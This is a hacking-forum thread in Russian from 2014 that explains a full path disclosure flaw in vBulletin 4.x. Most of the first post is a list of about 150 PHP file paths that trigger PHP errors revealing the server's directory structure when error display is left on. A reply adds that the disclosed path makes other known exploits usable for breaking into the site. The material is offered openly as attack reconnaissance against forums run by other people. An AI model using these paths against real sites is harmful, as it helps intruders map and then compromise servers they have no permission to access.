Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

vBulletin 4.x.x Full Path Disclosure

Тема в разделе vBulletin, создана пользователем ERROR404, 20 дек 2014.

Войдите для ответа
  1. ERROR404 Администратор

    ERROR404
    Статус:
    Вне сети
    Бывает, что админ форума полный рак в уязвимостях и у него включен показ ошибок PHP, тогда можно узнать полный путь до файла.


    Вбиваем любой путь в конец и видим путь до файла.



    /includes/api/commonwhitelist_2.php
    /includes/api/commonwhitelist_5.php
    /includes/api/commonwhitelist_6.php
    /includes/api/1/album_album.php
    /includes/api/1/album_editalbum.php
    /includes/api/1/album_latest.php
    /includes/api/1/album_overview.php
    /includes/api/1/album_picture.php
    /includes/api/1/album_user.php
    /includes/api/1/announcement_edit.php
    /includes/api/1/announcement_view.php
    /includes/api/1/api_cmscategorylist.php
    /includes/api/1/api_cmssectionlist.php
    /includes/api/1/api_forumlist.php
    /includes/api/1/api_getnewtop.php
    /includes/api/1/api_getsecuritytoken.php
    /includes/api/1/api_getsessionhash.php
    /includes/api/1/api_init.php
    /includes/api/1/api_mobilepublisher.php
    /includes/api/1/api_usersearch.php
    /includes/api/1/blog_blog.php
    /includes/api/1/blog_bloglist.php
    /includes/api/1/blog_comments.php
    /includes/api/1/blog_custompage.php
    /includes/api/1/blog_dosendtofriend.php
    /includes/api/1/blog_list.php
    /includes/api/1/blog_members.php
    /includes/api/1/blog_post_comment.php
    /includes/api/1/blog_post_editblog.php
    /includes/api/1/blog_post_editcomment.php
    /includes/api/1/blog_post_edittrackback.php
    /includes/api/1/blog_post_newblog.php
    /includes/api/1/blog_post_postcomment.php
    /includes/api/1/blog_post_updateblog.php
    /includes/api/1/blog_sendtofriend.php
    /includes/api/1/blog_subscription_entrylist.php
    /includes/api/1/blog_subscription_userlist.php
    /includes/api/1/blog_usercp_addcat.php
    /includes/api/1/blog_usercp_editcat.php
    /includes/api/1/blog_usercp_editoptions.php
    /includes/api/1/blog_usercp_editprofile.php
    /includes/api/1/blog_usercp_modifycat.php
    /includes/api/1/blog_usercp_updateprofile.php
    /includes/api/1/editpost_editpost.php
    /includes/api/1/editpost_updatepost.php
    /includes/api/1/forum.php
    /includes/api/1/forumdisplay.php
    /includes/api/1/inlinemod_domergeposts.php
    /includes/api/1/list.php
    /includes/api/1/login_lostpw.php
    /includes/api/1/member.php
    /includes/api/1/memberlist_search.php
    /includes/api/1/misc_showattachments.php
    /includes/api/1/misc_whoposted.php
    /includes/api/1/newreply_newreply.php
    /includes/api/1/newreply_postreply.php
    /includes/api/1/newthread_postthread.php
    /includes/api/1/newthread_newthread.php
    /includes/api/1/poll_newpoll.php
    /includes/api/1/poll_polledit.php
    /includes/api/1/poll_showresults.php
    /includes/api/1/private_editfolders.php
    /includes/api/1/private_insertpm.php
    /includes/api/1/private_messagelist.php
    /includes/api/1/private_newpm.php
    /includes/api/1/private_showpm.php
    /includes/api/1/private_trackpm.php
    /includes/api/1/profile_editattachments.php
    /includes/api/1/profile_editoptions.php
    /includes/api/1/profile_editprofile.php
    /includes/api/1/register_addmember.php
    /includes/api/1/register_checkdate.php
    /includes/api/1/search_process.php
    /includes/api/1/search_showresults.php
    /includes/api/1/showthread.php
    /includes/api/1/subscription_addsubscription.php
    /includes/api/1/subscription_editfolders.php
    /includes/api/1/subscription_viewsubscription.php
    /includes/api/1/threadtag_managetags.php
    /includes/api/2/album_picture.php
    /includes/api/2/api_blogcategorylist.php
    /includes/api/2/blog_blog.php
    /includes/api/2/blog_bloglist.php
    /includes/api/2/blog_list.php
    /includes/api/2/blog_subscription_entrylist.php
    /includes/api/2/blog_subscription_userlist.php
    /includes/api/2/blog_usercp_groups.php
    /includes/api/2/content.php
    /includes/api/2/editpost_editpost.php
    /includes/api/2/forumdisplay.php
    /includes/api/2/member.php
    /includes/api/2/newreply_newreply.php
    /includes/api/2/forum.php
    /includes/api/2/poll_newpoll.php
    /includes/api/2/poll_polledit.php
    /includes/api/2/poll_showresults.php
    /includes/api/2/private_messagelist.php
    /includes/api/2/private_trackpm.php
    /includes/api/2/profile_editattachments.php
    /includes/api/2/search_showresults.php
    /includes/api/2/showthread.php
    /includes/api/3/api_gotonewpost.php
    /includes/api/4/album_user.php
    /includes/api/4/api_forumlist.php
    /includes/api/4/api_getnewtop.php
    /includes/api/4/breadcrumbs_create.php
    /includes/api/4/facebook_getforumid.php
    /includes/api/4/facebook_getnewforummembers.php
    /includes/api/4/get_vbfromfacebook.php
    /includes/api/4/login_facebook.php
    /includes/api/4/newreply_postreply.php
    /includes/api/4/newthread_postthread.php
    /includes/api/4/uc_uc_register.php
    /includes/api/4/register_addmember.php
    /includes/api/4/search_findusers.php
    /includes/api/4/subscription_viewsubscription.php
    /includes/api/5/api_init.php
    /includes/api/6/api_getnewtop.php
    /includes/api/6/api_gotonewpost.php
    /includes/api/6/content.php
    /includes/api/6/member.php
    /includes/api/6/newthread_newthread.php
    /includes/block/blogentries.php
    /includes/block/cmsarticles.php
    /includes/block/html.php
    /includes/block/newposts.php
    /includes/block/sgdiscussions.php
    /includes/block/tagcloud.php
    /includes/block/threads.php
    /forumrunner/include/subscriptions.php
    /forumrunner/include/search_forum.php
    /forumrunner/include/profile.php
    /forumrunner/include/post.php
    /forumrunner/include/pms.php
    /forumrunner/include/online.php
    /forumrunner/include/moderation.php
    /forumrunner/include/misc.php
    /forumrunner/include/login.php
    /forumrunner/include/get_thread.php
    /forumrunner/include/get_forum.php
    /forumrunner/include/cms.php
    /forumrunner/include/attach.php
    /forumrunner/include/announcement.php
    /forumrunner/include/album.php
    /forumrunner/support/vbulletin_methods.php
    /forumrunner/support/stringparser_bbcode.class.php
    /forumrunner/support/utils.php
    /forumrunner/support/other_methods.php
    /packages/skimlinks/hooks/postbit_display_complete.php
    /packages/skimlinks/hooks/showthread_complete.php 
    /packages/skimlinks/hooks/userdata_start.php
    [/CODE]
     
    20 дек 2014 #1
  2. ERROR404 Администратор

    ERROR404
    Статус:
    Вне сети
    Там прикрыт показ ошибок.


    Зная полный путь можно взломать сайт через другой известный эксплоит. Просто для некоторых скриптов требуется полный путь
     
    20 дек 2014 #2
Загрузка...
Похожие темы
  1. ERROR404
    Ответов:
    1
    Просмотров:
    562
  2. ERROR404
    Ответов:
    0
    Просмотров:
    405
  3. ERROR404
    Ответов:
    0
    Просмотров:
    359
  4. ERROR404
    Ответов:
    0
    Просмотров:
    368
  5. ERROR404
    Ответов:
    0
    Просмотров:
    327
Top